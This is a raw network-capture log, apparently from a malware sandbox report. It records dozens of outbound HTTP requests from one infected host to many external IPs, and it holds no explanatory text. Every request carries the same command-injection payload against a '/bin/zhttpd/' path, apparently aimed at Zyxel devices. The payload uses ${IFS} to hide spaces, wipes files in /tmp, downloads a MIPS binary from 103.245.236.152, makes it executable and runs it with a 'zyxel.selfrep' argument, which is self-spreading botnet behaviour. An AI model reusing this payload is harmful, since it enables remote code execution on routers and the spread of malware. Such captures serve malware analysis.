                                          Jan 14, 2024 15:46:26.220156908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6689192.168.2.2354930101.84.221.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220171928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6690192.168.2.2354386117.237.129.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220206976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6691192.168.2.233850224.75.13.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220223904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6692192.168.2.2354198194.131.149.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220249891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6693192.168.2.233556452.235.128.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220279932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6694192.168.2.2343656145.28.116.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220336914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6695192.168.2.2335722156.57.216.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220344067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6696192.168.2.235085871.158.11.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220350027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6697192.168.2.2337438158.136.70.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220372915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6698192.168.2.2351974131.250.206.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220407963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6699192.168.2.2356022202.69.31.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220415115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6700192.168.2.2339036138.88.248.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220469952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6701192.168.2.2343232121.147.165.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220520973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6702192.168.2.235523898.140.240.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220540047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6703192.168.2.2336594122.72.57.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220558882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6704192.168.2.2346776129.119.11.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220581055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6705192.168.2.2348592119.189.22.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220623016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6706192.168.2.235153493.117.242.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220643044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6707192.168.2.2337322183.21.4.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220669031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6708192.168.2.2351676195.179.130.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220700026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6709192.168.2.2347056149.182.16.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220729113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6710192.168.2.234596457.219.9.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220758915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6711192.168.2.235496678.159.63.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220782995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6712192.168.2.234750613.117.89.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220808983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6713192.168.2.2352002216.154.245.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220829010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6714192.168.2.2334290209.159.111.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220860958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6715192.168.2.234401249.178.73.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220885038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6716192.168.2.2345126139.162.172.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220904112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6717192.168.2.2334912183.236.108.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220952988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6718192.168.2.23462882.209.224.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.220964909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6719192.168.2.234098463.219.109.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221033096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6720192.168.2.2341980199.245.219.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221050978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6721192.168.2.234680662.213.127.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221081972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6722192.168.2.2339210130.253.88.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221117020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6723192.168.2.233999873.166.162.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221148968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6724192.168.2.2355580136.133.13.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221174002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6725192.168.2.233326081.136.59.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221179008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6726192.168.2.2340746222.98.34.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221199036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6727192.168.2.234088249.111.226.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221220970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6728192.168.2.235234640.214.152.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221276045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6729192.168.2.2333548140.207.91.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221318007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6730192.168.2.2351928180.231.121.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221337080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6731192.168.2.2339150135.156.125.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221358061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6732192.168.2.2336202220.189.88.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221416950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6733192.168.2.235506844.204.112.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221421957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6734192.168.2.235278669.59.130.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221432924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6735192.168.2.234185045.99.225.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221483946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6736192.168.2.235922260.145.82.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221493006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6737192.168.2.23517709.239.102.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221529007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6738192.168.2.2356944212.194.209.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221555948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6739192.168.2.235680467.70.32.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221580982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6740192.168.2.234154039.27.250.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221616030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6741192.168.2.235584480.24.255.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221653938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6742192.168.2.2336018150.106.118.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221669912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6743192.168.2.2344476183.141.232.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221676111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6744192.168.2.235561296.122.72.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221689939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6745192.168.2.2349946218.13.50.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221738100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6746192.168.2.2353220110.121.170.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221750975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6747192.168.2.2342960179.252.121.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221780062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6748192.168.2.235112452.13.103.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221795082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6749192.168.2.2338892153.10.109.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221838951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6750192.168.2.233812417.163.97.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.221853971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6751192.168.2.234273897.214.58.54443
                                          TimestampBytes transferredDirectionData
